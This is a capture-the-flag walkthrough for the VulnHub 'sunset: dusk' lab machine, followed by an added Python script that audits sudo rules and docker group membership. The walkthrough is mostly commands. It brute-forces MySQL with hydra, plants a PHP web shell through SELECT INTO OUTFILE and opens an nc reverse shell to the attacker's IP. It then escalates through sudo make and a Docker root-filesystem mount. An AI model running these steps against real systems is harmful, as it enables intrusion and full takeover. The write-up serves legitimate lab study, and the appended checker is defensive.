貓寧~~~
Address: https://www.vulnhub.com/entry/sunset-dusk,404/
The focus is on the tools and the approach.
nmap 192.168.43.0/24
Target machine IP
192.168.43.200
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
nmap -A -p1-65535 192.168.43.200, paying attention to version vulnerabilities in each system service
Visit http://192.168.43.200:8080/ and http://192.168.43.200/
Success; the account and password are root/password
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.43.200 mysql
Log in to the database
mysql -h 192.168.43.200 -u root -P 3306 -p
select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/muma.php' ;
muma.php can be seen at http://192.168.43.200:8080/; the directory it is in is /var/tmp
http://192.168.43.200:8080/muma.php?cmd=id
http://192.168.43.200:8080/raj.php?cmd=nc%20-e%20/bin/bash%20192.168.43.154%204444
nc -e /bin/bash 192.168.43.154 4444
On the attacking machine: nc -lvnp 4444
Got a shell
python -c 'import pty;pty.spawn("/bin/bash")'
sudo -l
(dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
Escalate privileges to the dusk user
sudo -u dusk make --eval=$'x:\n\t'/bin/bash
Home directory
cat user.txt
08ebacf8f4e43f05b8b8b372df24235b
docker images
docker pull alpine
docker run -v /:/mnt -it alpine
Obtained root privileges
cd /mnt/root
cat root.txt
8930fa079a510ee880fe047d40dc613e
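
A defensive check for the two misconfigurations the escalation steps above rely on: a sudo rule that permits make, and a user who can reach the Docker daemon. This is an added example, not part of the original write-up. The binary list, the function names and the sample input are assumptions for illustration; the page does not show how dusk gained access to docker, so docker group membership is assumed.

```python
import re

# Binaries that can run arbitrary commands when allowed through sudo.
# "make" is the one in this page's sudo rule; the others are a small illustrative set.
SHELL_CAPABLE = {"make", "vi", "vim", "find", "awk", "less", "man", "env", "python", "perl"}

# Matches a rule line of `sudo -l`, e.g. "(dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_l(output):
    """Return (runas, command, nopasswd) for every risky rule in `sudo -l` output."""
    findings = []
    for line in output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header lines such as "User ... may run ..." are skipped
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in filter(None, (c.strip() for c in m.group("cmds").split(","))):
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or binary in SHELL_CAPABLE:
                findings.append((m.group("runas"), cmd, nopasswd))
    return findings


def docker_group_members(group_text):
    """Return users listed in the docker group of an /etc/group style text."""
    for line in group_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [u for u in fields[3].split(",") if u]
    return []


# Constructed sample input: the sudo rule line is the one shown on this page;
# the header line and the /etc/group lines are assumed for illustration.
SAMPLE_SUDO_L = """User webuser may run the following commands on dusk:
    (dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
"""
SAMPLE_GROUP = "root:x:0:\ndusk:x:1000:\ndocker:x:998:dusk\n"

if __name__ == "__main__":
    for runas, cmd, nopasswd in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"sudo: {cmd} as {runas} (NOPASSWD={nopasswd}) gives a shell as {runas}")
    for user in docker_group_members(SAMPLE_GROUP):
        print(f"group: {user} can use docker, which is equivalent to root on the host")
```

Removing make from the sudo rule and removing unprivileged users from the docker group closes both steps; ping and sl are not flagged because they offer no command execution.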